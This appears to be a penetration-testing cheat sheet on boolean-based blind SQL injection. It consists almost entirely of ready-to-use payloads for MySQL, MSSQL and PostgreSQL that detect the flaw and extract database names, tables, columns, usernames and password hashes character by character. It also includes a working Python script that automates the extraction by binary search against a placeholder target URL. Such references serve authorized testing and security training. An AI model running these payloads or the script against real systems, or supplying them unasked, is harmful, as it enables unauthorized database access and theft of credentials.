Skip to main content

Overview

No output or errors visible. Application responds differently (content, status code, redirect) for true vs false conditions. Extract data character by character.

Detect

' AND 1=1-- -          → Normal response (TRUE)
' AND 1=2-- -          → Different response (FALSE)
If responses differ → boolean blind injectable.

Extract Data — SUBSTRING

Database Name Length

' AND LENGTH(database())=1-- -
' AND LENGTH(database())=2-- -
...
' AND LENGTH(database())=5-- -     → TRUE (length is 5)

Database Name Character by Character

' AND SUBSTRING(database(),1,1)='a'-- -
' AND SUBSTRING(database(),1,1)='b'-- -
...
' AND SUBSTRING(database(),1,1)='t'-- -    → TRUE (first char is 't')
' AND SUBSTRING(database(),2,1)='e'-- -    → TRUE (second char is 'e')
' AND ASCII(SUBSTRING(database(),1,1))>96-- -     → TRUE (> 'a')
' AND ASCII(SUBSTRING(database(),1,1))>112-- -    → TRUE (> 'p')
' AND ASCII(SUBSTRING(database(),1,1))>120-- -    → FALSE
' AND ASCII(SUBSTRING(database(),1,1))>116-- -    → TRUE
' AND ASCII(SUBSTRING(database(),1,1))=116-- -    → TRUE (char = 't')
Binary search = ~7 requests per character instead of ~36.

Extract Tables

Count Tables

' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=5-- -

Table Name

' AND SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1)='u'-- -

Extract Columns

' AND SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1),1,1)='i'-- -

Extract Data

' AND SUBSTRING((SELECT username FROM users LIMIT 0,1),1,1)='a'-- -
' AND SUBSTRING((SELECT password FROM users LIMIT 0,1),1,1)='$'-- -

MSSQL Syntax

' AND SUBSTRING((SELECT DB_NAME()),1,1)='m'-- -
' AND ASCII(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1,1))>100-- -

PostgreSQL Syntax

' AND SUBSTRING((SELECT current_database()),1,1)='p'-- -
' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='public' LIMIT 1),1,1))>100-- -

Automation Script (Python)

import requests

url = "http://TARGET/page"
result = ""

for pos in range(1, 50):
    low, high = 32, 126
    while low <= high:
        mid = (low + high) // 2
        payload = f"' AND ASCII(SUBSTRING(database(),{pos},1))>{mid}-- -"
        r = requests.get(url, params={"id": payload})
        if "expected_true_content" in r.text:
            low = mid + 1
        else:
            high = mid - 1
    if low > 126:
        break
    result += chr(low)
    print(f"[+] {result}")

print(f"Result: {result}")

Quick Reference

StepPayload
Detect' AND 1=1-- - vs ' AND 1=2-- -
Length' AND LENGTH(database())=N-- -
Char by char' AND SUBSTRING(database(),POS,1)='x'-- -
Binary search' AND ASCII(SUBSTRING(database(),POS,1))>N-- -

Sources